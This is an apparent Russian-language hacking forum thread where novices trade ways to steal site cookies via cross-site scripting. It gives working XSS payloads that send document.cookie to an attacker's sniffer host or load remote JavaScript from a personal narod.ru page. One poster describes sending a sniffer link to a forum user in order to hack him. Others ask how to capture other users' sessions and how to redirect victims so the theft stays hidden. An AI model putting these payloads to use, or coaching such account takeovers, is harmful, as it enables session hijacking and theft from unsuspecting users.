Был там..но не понл куда именно впмсывать скрипт...в сам саит...привиде пример плизз))
Впринципе там всё понятно написано
1
Код:
Название сайта жертвы/free?p='><script>img=new Image();img.src="Ссылка на твой снифер(Лучьше всего s.netsec.ru зарегься там) ?"+document.cookie;"+document.cookie;</script>
2
Либо Регишься к примеру на народе тобиш яндекс создаёшь ява скрипт можно воспользоваться редакторо Dremweaver 8 там всё понятно расписано
Код:
Название сайта жертвы/free?p='><script src=http://Твой ник в народе .narod.ru/js.js></script>
Исходник дан в скрипте
2.Более сложный способ!Залить линк на свой снифер через админку , но для этого собственно нужен доступ=) Я сам в принципе новичок у меня всего один раз получалось как банер заливать
я захотел взломать чела на форуме и отослал ему ссылку на мои сниффер http://s.netsec.ru/plum.gif
он перешел по неи, но ко мне пришло пустое поле стринг=(( в чем непральность запроса?
Заранее спасибо
P.S не посылаите в другие маста...напишите более подробно и понтно новичку...хочу научитс))
поня где читать....но как его подать то если надо писать тэг <script> но в форумах он не пашет...а если к ссылке добоволять +document cookie то он пишет в поле стринг document.cookie
Я нашел Xss...
запрос подал вот так <script>alert(document.cookie)</script>
увидел свою сессию, а как сделать так что бы это отсылалось на мой сниффер и не только моя сессия=))?
АВТОР,
не мог бы ты сделать переадресацию?допустим жертва зашла на снифф, все ок и ее перекинуло, скажем на ya.ru так удобнее и как-то скрытнее...а если "куда переадресовывать" еще можно будет настраивать, то тебе просто огромнейшее спасибо!!!!!